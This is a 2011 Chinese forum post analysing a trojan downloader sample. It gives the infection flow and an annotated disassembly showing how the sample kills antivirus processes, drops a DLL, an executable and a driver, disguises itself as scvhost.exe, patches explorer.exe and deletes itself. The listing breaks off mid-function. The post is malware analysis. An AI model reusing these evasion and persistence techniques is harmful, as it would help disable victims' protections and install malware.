-
-
[旧帖] [原创]找了一个有样本的木马下载者分析 0.00雪花
-
发表于: 2011-10-20 02:59 2235
-
病毒流程分析:
1、创建一个互斥体
2、停止ekrn服务,结束ekrn.exe,egui.exe进程。
3、释放动态库文件 "C:\WINDOWS\system32\44810500.dll",结束大量安全软件进程,劫持安全软件。
4、调用GetTickCount函数,根据开机时间生成一个EXE文件到WINDOWS目录(我的机器为:C:\WINDOWS\45757859.exe),45757859.exe是一个木马下载者
5、释放驱动文件pcidump.sys,创建服务启动驱动,修改gm.dls和explorer.exe,删除驱动文件
备注:分别创建 44810500.dll、pcidump.sys、45757859.exe主要文件
主体分析:
00402230 . 81EC 680B0000 sub esp, 0B68 ; (Initial CPU selection)
00402236 . 53 push ebx
00402237 . 55 push ebp
00402238 . 56 push esi
00402239 . 57 push edi
0040223A . B9 3F000000 mov ecx, 3F
0040223F . 33C0 xor eax, eax
00402241 . 8DBC24 74050000 lea edi, dword ptr [esp+574]
00402248 . 68 E0134000 push 004013E0 ; /TGmae...
0040224D . F3:AB rep stos dword ptr es:[edi] ; |
0040224F . 66:AB stos word ptr es:[edi] ; |
00402251 . AA stos byte ptr es:[edi] ; |
00402252 . B9 3F000000 mov ecx, 3F ; |
00402257 . 33C0 xor eax, eax ; |
00402259 . 8DBC24 78070000 lea edi, dword ptr [esp+778] ; |
00402260 . B3 5C mov bl, 5C ; |
00402262 . F3:AB rep stos dword ptr es:[edi] ; |
00402264 . 66:AB stos word ptr es:[edi] ; |
00402266 . AA stos byte ptr es:[edi] ; |
00402267 . B9 3F000000 mov ecx, 3F ; |
0040226C . 33C0 xor eax, eax ; |
0040226E . 8DBC24 78060000 lea edi, dword ptr [esp+678] ; |
00402275 . 6A 00 push 0 ; |InitialOwner = FALSE
00402277 . F3:AB rep stos dword ptr es:[edi] ; |
00402279 . 66:AB stos word ptr es:[edi] ; |
0040227B . AA stos byte ptr es:[edi] ; |
0040227C . B9 3F000000 mov ecx, 3F ; |
00402281 . 33C0 xor eax, eax ; |
00402283 . 8D7C24 78 lea edi, dword ptr [esp+78] ; |
00402287 . 6A 00 push 0 ; |pSecurity = NULL
00402289 . F3:AB rep stos dword ptr es:[edi] ; |
0040228B . 66:AB stos word ptr es:[edi] ; |
0040228D . 885C24 24 mov byte ptr [esp+24], bl ; |输入\Explorer.EXE
00402291 . C64424 25 45 mov byte ptr [esp+25], 45 ; |
00402296 . C64424 26 78 mov byte ptr [esp+26], 78 ; |
0040229B . C64424 27 70 mov byte ptr [esp+27], 70 ; |
004022A0 . C64424 28 6C mov byte ptr [esp+28], 6C ; |
004022A5 . C64424 29 6F mov byte ptr [esp+29], 6F ; |
004022AA . C64424 2A 72 mov byte ptr [esp+2A], 72 ; |
004022AF . C64424 2B 65 mov byte ptr [esp+2B], 65 ; |
004022B4 . C64424 2C 72 mov byte ptr [esp+2C], 72 ; |
004022B9 . C64424 2D 2E mov byte ptr [esp+2D], 2E ; |
004022BE . C64424 2E 45 mov byte ptr [esp+2E], 45 ; |
004022C3 . C64424 2F 58 mov byte ptr [esp+2F], 58 ; |
004022C8 . C64424 30 45 mov byte ptr [esp+30], 45 ; |
004022CD . C64424 31 00 mov byte ptr [esp+31], 0 ; |
004022D2 . AA stos byte ptr es:[edi] ; |
004022D3 . FF15 84104000 call dword ptr [401084] ; \CreateMutexA 创建一个TGmae的互斥体,防止多次运行
004022D9 . FF15 80104000 call dword ptr [401080] ; ntdll.RtlGetLastWin32Error
004022DF . 3D B7000000 cmp eax, 0B7
004022E4 . 75 08 jnz short 004022EE
004022E6 . 6A 00 push 0 ; /ExitCode = 0
004022E8 . FF15 54104000 call dword ptr [401054] ; \ExitProcess
004022EE > 8B35 7C104000 mov esi, dword ptr [40107C] ; kernel32.GetWindowsDirectoryA
004022F4 . 8D8424 74060000 lea eax, dword ptr [esp+674]
004022FB . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402300 . 50 push eax ; |Buffer
00402301 . FFD6 call esi ; \GetWindowsDirectoryA
00402303 . 8D8C24 74050000 lea ecx, dword ptr [esp+574]
0040230A . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040230F . 51 push ecx ; |Buffer
00402310 . FFD6 call esi ; \GetWindowsDirectoryA
00402312 . 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00402318 . 8D5424 18 lea edx, dword ptr [esp+18]
0040231C . 8D8424 74050000 lea eax, dword ptr [esp+574]
00402323 . 52 push edx ; /StringToAdd
00402324 . 50 push eax ; |ConcatString
00402325 . FFD6 call esi ; \lstrcatA
00402327 . 8D8C24 74070000 lea ecx, dword ptr [esp+774] ; 连接字符串C:\WINDOWS\Explorer.EXE
0040232E . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402333 . 51 push ecx ; |Buffer
00402334 . 885C24 4C mov byte ptr [esp+4C], bl ; |
00402338 . C64424 4D 74 mov byte ptr [esp+4D], 74 ; |
0040233D . C64424 4E 65 mov byte ptr [esp+4E], 65 ; |
00402342 . C64424 4F 6D mov byte ptr [esp+4F], 6D ; |
00402347 . C64424 50 70 mov byte ptr [esp+50], 70 ; |
0040234C . 885C24 51 mov byte ptr [esp+51], bl ; |
00402350 . C64424 52 45 mov byte ptr [esp+52], 45 ; |
00402355 . C64424 53 78 mov byte ptr [esp+53], 78 ; |
0040235A . C64424 54 70 mov byte ptr [esp+54], 70 ; |
0040235F . C64424 55 6C mov byte ptr [esp+55], 6C ; |
00402364 . C64424 56 6F mov byte ptr [esp+56], 6F ; |
00402369 . C64424 57 72 mov byte ptr [esp+57], 72 ; |
0040236E . C64424 58 65 mov byte ptr [esp+58], 65 ; |
00402373 . C64424 59 72 mov byte ptr [esp+59], 72 ; |
00402378 . C64424 5A 2E mov byte ptr [esp+5A], 2E ; |
0040237D . C64424 5B 65 mov byte ptr [esp+5B], 65 ; |
00402382 . C64424 5C 78 mov byte ptr [esp+5C], 78 ; |
00402387 . C64424 5D 65 mov byte ptr [esp+5D], 65 ; |
0040238C . C64424 5E 00 mov byte ptr [esp+5E], 0 ; |
00402391 . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00402397 . 8D5424 70 lea edx, dword ptr [esp+70]
0040239B . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004023A0 . 52 push edx ; |PathBuffer
004023A1 . 6A 00 push 0 ; |hModule = NULL
004023A3 . 885C24 40 mov byte ptr [esp+40], bl ; |输入\drivers\gm.dls
004023A7 . C64424 41 64 mov byte ptr [esp+41], 64 ; |
004023AC . C64424 42 72 mov byte ptr [esp+42], 72 ; |
004023B1 . C64424 43 69 mov byte ptr [esp+43], 69 ; |
004023B6 . C64424 44 76 mov byte ptr [esp+44], 76 ; |
004023BB . C64424 45 65 mov byte ptr [esp+45], 65 ; |
004023C0 . C64424 46 72 mov byte ptr [esp+46], 72 ; |
004023C5 . C64424 47 73 mov byte ptr [esp+47], 73 ; |
004023CA . 885C24 48 mov byte ptr [esp+48], bl ; |
004023CE . C64424 49 67 mov byte ptr [esp+49], 67 ; |
004023D3 . C64424 4A 6D mov byte ptr [esp+4A], 6D ; |
004023D8 . C64424 4B 2E mov byte ptr [esp+4B], 2E ; |
004023DD . C64424 4C 64 mov byte ptr [esp+4C], 64 ; |
004023E2 . C64424 4D 6C mov byte ptr [esp+4D], 6C ; |
004023E7 . C64424 4E 73 mov byte ptr [esp+4E], 73 ; |
004023EC . C64424 4F 00 mov byte ptr [esp+4F], 0 ; |
004023F1 . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
004023F7 . 8D8424 74050000 lea eax, dword ptr [esp+574] ; C:\trojan\trojan\412489_fm01.exe
004023FE . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402402 . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
00402403 . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
00402404 . FF15 48104000 call dword ptr [401048] ; \lstrcmpiA
0040240A . 85C0 test eax, eax
0040240C . 75 5B jnz short 00402469 ; 判断当前进程是不是explorer.exe,是继续,不是跳转
0040240E . A2 78124000 mov byte ptr [401278], al
00402413 . 8D5424 44 lea edx, dword ptr [esp+44]
00402417 . 8D8424 74060000 lea eax, dword ptr [esp+674]
0040241E . 52 push edx ; /StringToAdd
0040241F . 50 push eax ; |ConcatString
00402420 . FFD6 call esi ; \lstrcatA
00402422 . 8D4C24 34 lea ecx, dword ptr [esp+34] ; C:\WINDOWS\temp\Explorer.exe
00402426 . 8D9424 74070000 lea edx, dword ptr [esp+774]
0040242D . 51 push ecx ; /StringToAdd
0040242E . 52 push edx ; |ConcatString
0040242F . FFD6 call esi ; \lstrcatA
00402431 . 8D8424 74060000 lea eax, dword ptr [esp+674] ; C:\WINDOWS\system32\drivers\gm.dls
00402438 . 6A 00 push 0 ; /FailIfExists = FALSE
0040243A . 8D8C24 78070000 lea ecx, dword ptr [esp+778] ; |
00402441 . 50 push eax ; |NewFileName
00402442 . 51 push ecx ; |ExistingFileName
00402443 . FF15 78104000 call dword ptr [401078] ; \CopyFileA
00402449 . 6A 00 push 0 ; 复制C:\WINDOWS\system32\drivers\gm.dls为 C:\WINDOWS\temp\Explorer.exe
0040244B . 6A 00 push 0
0040244D . 8D9424 7C060000 lea edx, dword ptr [esp+67C]
00402454 . 68 E4104000 push 004010E4
00402459 . 52 push edx
0040245A . 68 C8124000 push 004012C8 ; open
0040245F . 6A 00 push 0
00402461 . E8 DAEFFFFF call <动态获得函数地址并运行文件>
00402466 . 83C4 18 add esp, 18
00402469 > E8 D2F9FFFF call <设置权限>
0040246E . 6A 00 push 0 ; /pThreadId = NULL
00402470 . 6A 00 push 0 ; |CreationFlags = 0
00402472 . 6A 00 push 0 ; |pThreadParm = NULL
00402474 . 68 20224000 push 00402220 ; |ThreadFunction = 412489_f.00402220
00402479 . 6A 00 push 0 ; |StackSize = 0
0040247B . 6A 00 push 0 ; |pSecurity = NULL
0040247D . FF15 74104000 call dword ptr [401074] ; \CreateThread
00402483 . 8B2D 9C104000 mov ebp, dword ptr [40109C] ; kernel32.Sleep
00402489 . 68 88130000 push 1388 ; /Timeout = 5000. ms
0040248E . FFD5 call ebp ; \Sleep
00402490 . E8 DBF4FFFF call 00401970 ; 关键call 1 关闭指定进程
00402495 . 68 E8030000 push 3E8
0040249A . FFD5 call ebp ; kernel32.Sleep
0040249C . E8 3FF8FFFF call 00401CE0 ; 关键call 2释放动态链接库C:\WINDOWS\system32\44810500.dll,创建进程,调用C:\WINDOWS\system32\rundll32.exe加载 44810500.dll
004024A1 . 68 E8030000 push 3E8
004024A6 . FFD5 call ebp ; kernel32.Sleep
004024A8 . B9 3F000000 mov ecx, 3F
004024AD . 33C0 xor eax, eax
004024AF . 8DBC24 70030000 lea edi, dword ptr [esp+370]
004024B6 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004024BB . F3:AB rep stos dword ptr es:[edi] ; |
004024BD . 66:AB stos word ptr es:[edi] ; |
004024BF . AA stos byte ptr es:[edi] ; |
004024C0 . B9 3F000000 mov ecx, 3F ; |
004024C5 . 33C0 xor eax, eax ; |
004024C7 . 8DBC24 78090000 lea edi, dword ptr [esp+978] ; |
004024CE . F3:AB rep stos dword ptr es:[edi] ; |
004024D0 . 66:AB stos word ptr es:[edi] ; |
004024D2 . AA stos byte ptr es:[edi] ; |
004024D3 . 8D8424 74030000 lea eax, dword ptr [esp+374] ; |
004024DA . 50 push eax ; |Buffer
004024DB . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
004024E1 . FF15 68104000 call dword ptr [401068] ; [GetTickCount
004024E7 . 50 push eax ; /<%d>
004024E8 . 8D8C24 78090000 lea ecx, dword ptr [esp+978] ; |
004024EF . 68 D8134000 push 004013D8 ; |%d.exe
004024F4 . 51 push ecx ; |s
004024F5 . FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
004024FB . 83C4 0C add esp, 0C
004024FE . 8D9424 70030000 lea edx, dword ptr [esp+370]
00402505 . 68 D4134000 push 004013D4 ; \
0040250A . 52 push edx
0040250B . FFD6 call esi ; kernel32.lstrcatA
0040250D . 8D8424 74090000 lea eax, dword ptr [esp+974]
00402514 . 8D8C24 70030000 lea ecx, dword ptr [esp+370]
0040251B . 50 push eax
0040251C . 51 push ecx
0040251D . FFD6 call esi ; kernel32.lstrcatA
0040251F . 8D9424 70030000 lea edx, dword ptr [esp+370] ; C:\WINDOWS\system32\45757859.exe
00402526 . 6A 65 push 65
00402528 . 52 push edx
00402529 . E8 02F3FFFF call <创建文件> 创建文件C:\WINDOWS\system32\45757859.exe
0040252E . 6A 00 push 0
00402530 . 6A 00 push 0
00402532 . 8D8424 78030000 lea eax, dword ptr [esp+378]
00402539 . 68 E4104000 push 004010E4
0040253E . 50 push eax
0040253F . 68 C8124000 push 004012C8 ; open
00402544 . 6A 00 push 0
00402546 . E8 F5EEFFFF call <动态获得函数地址并运行文件>
0040254B . 83C4 18 add esp, 18
0040254E . 68 E8030000 push 3E8
00402553 . FFD5 call ebp
00402555 . 885C24 58 mov byte ptr [esp+58], bl ; \drivers\pcidump
00402559 . C64424 59 64 mov byte ptr [esp+59], 64
0040255E . C64424 5A 72 mov byte ptr [esp+5A], 72
00402563 . C64424 5B 69 mov byte ptr [esp+5B], 69
00402568 . C64424 5C 76 mov byte ptr [esp+5C], 76
0040256D . C64424 5D 65 mov byte ptr [esp+5D], 65
00402572 . C64424 5E 72 mov byte ptr [esp+5E], 72
00402577 . C64424 5F 73 mov byte ptr [esp+5F], 73
0040257C . 885C24 60 mov byte ptr [esp+60], bl
00402580 . C64424 61 70 mov byte ptr [esp+61], 70
00402585 . C64424 62 63 mov byte ptr [esp+62], 63
0040258A . C64424 63 69 mov byte ptr [esp+63], 69
0040258F . C64424 64 64 mov byte ptr [esp+64], 64
00402594 . C64424 65 75 mov byte ptr [esp+65], 75
00402599 . C64424 66 6D mov byte ptr [esp+66], 6D
0040259E . C64424 67 70 mov byte ptr [esp+67], 70
004025A3 . C64424 68 2E mov byte ptr [esp+68], 2E
004025A8 . B9 3F000000 mov ecx, 3F
004025AD . 33C0 xor eax, eax
004025AF . 8D7C24 70 lea edi, dword ptr [esp+70]
004025B3 . 885C24 10 mov byte ptr [esp+10], bl
004025B7 . F3:AB rep stos dword ptr es:[edi]
004025B9 . 66:AB stos word ptr es:[edi]
004025BB . AA stos byte ptr es:[edi]
004025BC . B9 3F000000 mov ecx, 3F
004025C1 . 33C0 xor eax, eax
004025C3 . 8DBC24 74040000 lea edi, dword ptr [esp+474]
004025CA . 885C24 13 mov byte ptr [esp+13], bl
004025CE . F3:AB rep stos dword ptr es:[edi]
004025D0 . 66:AB stos word ptr es:[edi]
004025D2 . AA stos byte ptr es:[edi]
004025D3 . B9 3F000000 mov ecx, 3F
004025D8 . 33C0 xor eax, eax
004025DA . 8DBC24 74080000 lea edi, dword ptr [esp+874]
004025E1 . 8B1D 90104000 mov ebx, dword ptr [401090] ; kernel32.GetSystemDirectoryA
004025E7 . F3:AB rep stos dword ptr es:[edi]
004025E9 . 66:AB stos word ptr es:[edi]
004025EB . AA stos byte ptr es:[edi]
004025EC . B9 3F000000 mov ecx, 3F
004025F1 . 33C0 xor eax, eax
004025F3 . 8DBC24 70020000 lea edi, dword ptr [esp+270]
004025FA . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004025FF . F3:AB rep stos dword ptr es:[edi] ; |
00402601 . 66:AB stos word ptr es:[edi] ; |
00402603 . 8D8C24 74020000 lea ecx, dword ptr [esp+274] ; |
0040260A . C64424 6D 73 mov byte ptr [esp+6D], 73 ; |
0040260F . 51 push ecx ; |Buffer
00402610 . C64424 72 79 mov byte ptr [esp+72], 79 ; |
00402615 . C64424 73 73 mov byte ptr [esp+73], 73 ; |
0040261A . C64424 74 00 mov byte ptr [esp+74], 0 ; |
0040261F . C64424 19 3F mov byte ptr [esp+19], 3F ; |
00402624 . C64424 1A 3F mov byte ptr [esp+1A], 3F ; |
00402629 . C64424 1C 00 mov byte ptr [esp+1C], 0 ; |
0040262E . AA stos byte ptr es:[edi] ; |
0040262F . FFD3 call ebx ; \GetSystemDirectoryA
00402631 . 8D5424 58 lea edx, dword ptr [esp+58]
00402635 . 8D8424 70020000 lea eax, dword ptr [esp+270]
0040263C . 52 push edx
0040263D . 50 push eax
0040263E . FFD6 call esi
00402640 . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402644 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402649 . 51 push ecx ; |PathBuffer
0040264A . 6A 00 push 0 ; |hModule = NULL
0040264C . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402652 . 8D9424 70020000 lea edx, dword ptr [esp+270]
00402659 . 6A 67 push 67
0040265B . 52 push edx
0040265C . E8 CFF1FFFF call <创建文件> ; 创建文件"C:\WINDOWS\system32\drivers\pcidump.sys"
00402661 . 8D8424 70020000 lea eax, dword ptr [esp+270]
00402668 . 50 push eax
00402669 . E8 22EEFFFF call 00401490 ; 启动服务
0040266E . 83C4 04 add esp, 4
00402671 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
00402678 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040267D . 51 push ecx ; |Buffer
0040267E . FF15 7C104000 call dword ptr [40107C] ; \GetWindowsDirectoryA
00402684 . 8B3D 8C104000 mov edi, dword ptr [40108C] ; kernel32.lstrcpyA
0040268A . 8D5424 10 lea edx, dword ptr [esp+10]
0040268E . 8D8424 74040000 lea eax, dword ptr [esp+474]
00402695 . 52 push edx ; /String2
00402696 . 50 push eax ; |String1
00402697 . FFD7 call edi ; \lstrcpyA
00402699 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
004026A0 . 8D9424 74040000 lea edx, dword ptr [esp+474]
004026A7 . 51 push ecx
004026A8 . 52 push edx
004026A9 . FFD6 call esi
004026AB . 8D4424 18 lea eax, dword ptr [esp+18]
004026AF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026B6 . 50 push eax
004026B7 . 51 push ecx
004026B8 . FFD6 call esi
004026BA . 8D5424 10 lea edx, dword ptr [esp+10]
004026BE . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026C5 . 52 push edx
004026C6 . 50 push eax
004026C7 . FFD7 call edi
004026C9 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004026CD . 8D9424 74080000 lea edx, dword ptr [esp+874]
004026D4 . 51 push ecx
004026D5 . 52 push edx
004026D6 . FFD6 call esi
004026D8 . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026DF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026E6 . 50 push eax
004026E7 . 51 push ecx
004026E8 . E8 63EFFFFF call 00401650 ; 关键call 3 修改gm.dls和explorer.exe
004026ED . 8D9424 78020000 lea edx, dword ptr [esp+278]
004026F4 . 52 push edx
004026F5 . E8 B6EEFFFF call 004015B0 ; 删除驱动文件
004026FA . 83C4 0C add esp, 0C
004026FD . 68 E8030000 push 3E8
00402702 . FFD5 call ebp ; kernel32.Sleep
00402704 . B9 3F000000 mov ecx, 3F
00402709 . 33C0 xor eax, eax
0040270B . 8D7C24 70 lea edi, dword ptr [esp+70]
0040270F . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402714 . F3:AB rep stos dword ptr es:[edi] ; |
00402716 . 66:AB stos word ptr es:[edi] ; |
00402718 . AA stos byte ptr es:[edi] ; |
00402719 . B9 3F000000 mov ecx, 3F ; |
0040271E . 33C0 xor eax, eax ; |
00402720 . 8DBC24 74010000 lea edi, dword ptr [esp+174] ; |
00402727 . C64424 2C 73 mov byte ptr [esp+2C], 73 ; |
0040272C . F3:AB rep stos dword ptr es:[edi] ; |
0040272E . 66:AB stos word ptr es:[edi] ; |
00402730 . AA stos byte ptr es:[edi] ; |
00402731 . 8D4424 74 lea eax, dword ptr [esp+74] ; |
00402735 . C64424 2D 63 mov byte ptr [esp+2D], 63 ; |
0040273A . 50 push eax ; |PathBuffer
0040273B . 6A 00 push 0 ; |hModule = NULL
0040273D . C64424 36 76 mov byte ptr [esp+36], 76 ; |输入svhost.exe
00402742 . C64424 37 68 mov byte ptr [esp+37], 68 ; |
00402747 . C64424 38 6F mov byte ptr [esp+38], 6F ; |
0040274C . C64424 39 73 mov byte ptr [esp+39], 73 ; |
00402751 . C64424 3A 74 mov byte ptr [esp+3A], 74 ; |
00402756 . C64424 3B 2E mov byte ptr [esp+3B], 2E ; |
0040275B . C64424 3C 65 mov byte ptr [esp+3C], 65 ; |
00402760 . C64424 3D 78 mov byte ptr [esp+3D], 78 ; |
00402765 . C64424 3E 65 mov byte ptr [esp+3E], 65 ; |
0040276A . C64424 3F 00 mov byte ptr [esp+3F], 0 ; |
0040276F . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402775 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040277C . 68 FF000000 push 0FF
00402781 . 51 push ecx
00402782 . FFD3 call ebx
00402784 . 8D9424 70010000 lea edx, dword ptr [esp+170]
0040278B . 68 D4134000 push 004013D4 ; \
00402790 . 52 push edx
00402791 . FFD6 call esi ; kernel32.lstrcatA
00402793 . 8D4424 28 lea eax, dword ptr [esp+28]
00402797 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040279E . 50 push eax ; // "scvhost.exe"
0040279F . 51 push ecx ; "C:\WINDOWS\system32\"
004027A0 . FFD6 call esi
004027A2 . 8D9424 70010000 lea edx, dword ptr [esp+170] ; 把"C:\trojan\trojan\412489_fm01.exe"复制为"C:\WINDOWS\system32\scvhost.exe"
004027A9 . 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004027AB . 8D4424 74 lea eax, dword ptr [esp+74] ; |
004027AF . 52 push edx ; |0012F444 0012F5BC |NewName = "C:\WINDOWS\system32\scvhost.exe"
004027B0 . 50 push eax ; |0012F440 0012F4BC |ExistingName = "C:\trojan\trojan\412489_fm01.exe"
004027B1 . FF15 70104000 call dword ptr [401070] ; \MoveFileExA
004027B7 . 8B35 48104000 mov esi, dword ptr [401048] ; kernel32.lstrcmpiA
004027BD . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
004027C4 . 8D5424 70 lea edx, dword ptr [esp+70]
004027C8 . 51 push ecx ; /String2
004027C9 . 52 push edx ; |String1
004027CA . FFD6 call esi ; \lstrcmpiA
004027CC . 85C0 test eax, eax
004027CE . 74 18 je short 004027E8
004027D0 . 8D8424 74050000 lea eax, dword ptr [esp+574]
004027D7 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004027DB . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
004027DC . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
004027DD . FFD6 call esi ; \lstrcmpiA
004027DF . 85C0 test eax, eax
004027E1 . 74 05 je short 004027E8
004027E3 . E8 88F3FFFF call 00401B70 ; c关键all 4 自删除函数
004027E8 > 5F pop edi
004027E9 . 5E pop esi
004027EA . 5D pop ebp
004027EB . 33C0 xor eax, eax
004027ED . 5B pop ebx
004027EE . 81C4 680B0000 add esp, 0B68
004027F4 . C2 1000 retn 10
关键call 1
00401970 /$ 83EC 58 sub esp, 58
00401973 |. 53 push ebx
00401974 |. B3 63 mov bl, 63
00401976 |. B0 20 mov al, 20
00401978 |. B2 2F mov dl, 2F
0040197A |. B1 65 mov cl, 65
0040197C |. 885C24 04 mov byte ptr [esp+4], bl
......
00401AD1 |. C64424 52 75 mov byte ptr [esp+52], 75
00401AD6 |. 68 D0124000 push 004012D0 ; ekrn.exe
00401ADB |. C64424 57 69 mov byte ptr [esp+57], 69
00401AE0 |. C64424 58 2E mov byte ptr [esp+58], 2E
00401AE5 |. 884C24 59 mov byte ptr [esp+59], cl
00401AE9 |. C64424 5A 78 mov byte ptr [esp+5A], 78
00401AEE |. 884C24 5B mov byte ptr [esp+5B], cl
00401AF2 |. 884424 5C mov byte ptr [esp+5C], al
00401AF6 |. 885424 5D mov byte ptr [esp+5D], dl
00401AFA |. C64424 5E 66 mov byte ptr [esp+5E], 66
00401AFF |. E8 ECFDFFFF call 004018F0 ; 关闭指定进程
00401B04 |. 83C4 04 add esp, 4
00401B07 |. 85C0 test eax, eax
00401B09 |. 5B pop ebx
00401B0A |. 74 5C je short 00401B68
00401B0C |. 6A 00 push 0
00401B0E |. 6A 00 push 0
00401B10 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401B14 |. 68 E4104000 push 004010E4
00401B19 |. 50 push eax
00401B1A |. 68 C8124000 push 004012C8 ; open
00401B1F |. 6A 00 push 0
00401B21 |. E8 1AF9FFFF call <动态获得函数地址并运行文件>
00401B26 |. 6A 00 push 0
00401B28 |. 6A 00 push 0
00401B2A |. 8D4C24 38 lea ecx, dword ptr [esp+38]
00401B2E |. 68 E4104000 push 004010E4
00401B33 |. 51 push ecx
00401B34 |. 68 C8124000 push 004012C8 ; open
00401B39 |. 6A 00 push 0
00401B3B |. E8 00F9FFFF call <动态获得函数地址并运行文件>
00401B40 |. 6A 00 push 0
00401B42 |. 6A 00 push 0
00401B44 |. 8D5424 70 lea edx, dword ptr [esp+70]
00401B48 |. 68 E4104000 push 004010E4
00401B4D |. 52 push edx
00401B4E |. 68 C8124000 push 004012C8 ; open
00401B53 |. 6A 00 push 0
00401B55 |. E8 E6F8FFFF call <动态获得函数地址并运行文件>
00401B5A |. 83C4 48 add esp, 48
00401B5D |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00401B62 |. FF15 9C104000 call dword ptr [40109C] ; \Sleep
00401B68 |> 83C4 58 add esp, 58
00401B6B \. C3 retn
关键call 2
00401CE0 /$ 81EC 54030000 sub esp, 354
00401CE6 |. 53 push ebx
00401CE7 |. 56 push esi
00401CE8 |. 57 push edi
00401CE9 |. B9 3F000000 mov ecx, 3F
00401CEE |. 33C0 xor eax, eax
00401CF0 |. 8D7C24 60 lea edi, dword ptr [esp+60]
00401CF4 |. F3:AB rep stos dword ptr es:[edi]
00401CF6 |. 66:AB stos word ptr es:[edi]
00401CF8 |. AA stos byte ptr es:[edi]
00401CF9 |. B9 3F000000 mov ecx, 3F
00401CFE |. 33C0 xor eax, eax
00401D00 |. 8DBC24 60020000 lea edi, dword ptr [esp+260]
00401D07 |. F3:AB rep stos dword ptr es:[edi]
00401D09 |. 66:AB stos word ptr es:[edi]
00401D0B |. AA stos byte ptr es:[edi]
00401D0C |. B9 3F000000 mov ecx, 3F
00401D11 |. 33C0 xor eax, eax
00401D13 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D1A |. F3:AB rep stos dword ptr es:[edi]
00401D1C |. 66:AB stos word ptr es:[edi]
00401D1E |. AA stos byte ptr es:[edi]
00401D1F |. FF15 68104000 call dword ptr [401068] ; [GetTickCount
00401D25 |. 50 push eax ; /<%d>
00401D26 |. 8D8424 64020000 lea eax, dword ptr [esp+264] ; |
00401D2D |. 68 54134000 push 00401354 ; |%d.dll
00401D32 |. 50 push eax ; |s
00401D33 |. FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
00401D39 |. 83C4 0C add esp, 0C ; 44810500.dll
00401D3C |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D40 |. 51 push ecx ; /Buffer
00401D41 |. 68 FF000000 push 0FF ; |BufSize = FF (255.)
00401D46 |. FF15 AC104000 call dword ptr [4010AC] ; \GetTempPathA
00401D4C |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401D52 |. 8D9424 60020000 lea edx, dword ptr [esp+260]
00401D59 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401D5D |. 52 push edx ; /StringToAdd
00401D5E |. 50 push eax ; |ConcatString
00401D5F |. FFD6 call esi ; \lstrcatA
00401D61 |. 8D4C24 60 lea ecx, dword ptr [esp+60] ; //连接字符串C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll
00401D65 |. 6A 66 push 66
00401D67 |. 51 push ecx
00401D68 |. E8 C3FAFFFF call <创建文件> //创建 44810500.dll文件
00401D6D |. 8B1D 8C104000 mov ebx, dword ptr [40108C] ; kernel32.lstrcpyA
00401D73 |. 8D5424 60 lea edx, dword ptr [esp+60]
00401D77 |. 8D8424 60010000 lea eax, dword ptr [esp+160]
00401D7E |. 52 push edx ; /String2
00401D7F |. 50 push eax ; |String1
00401D80 |. FFD3 call ebx ; \lstrcpyA
00401D82 |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D86 |. 68 48134000 push 00401348 ; testall
00401D8B |. 51 push ecx
00401D8C |. FFD6 call esi
00401D8E |. B9 3F000000 mov ecx, 3F
00401D93 |. 33C0 xor eax, eax
00401D95 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D9C |. 8D9424 60010000 lea edx, dword ptr [esp+160]
00401DA3 |. F3:AB rep stos dword ptr es:[edi]
00401DA5 |. 66:AB stos word ptr es:[edi]
00401DA7 |. 68 38134000 push 00401338 ; rundll32.exe
00401DAC |. 52 push edx
00401DAD |. AA stos byte ptr es:[edi]
00401DAE |. FFD3 call ebx ; kernel32.lstrcpyA
00401DB0 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401DB4 |. 8D8C24 60010000 lea ecx, dword ptr [esp+160]
00401DBB |. 50 push eax
00401DBC |. 51 push ecx
00401DBD |. FFD6 call esi
00401DBF |. B9 11000000 mov ecx, 11
00401DC4 |. 33C0 xor eax, eax
00401DC6 |. 8D7C24 1C lea edi, dword ptr [esp+1C]
00401DCA |. 8D5424 0C lea edx, dword ptr [esp+C]
00401DCE |. F3:AB rep stos dword ptr es:[edi]
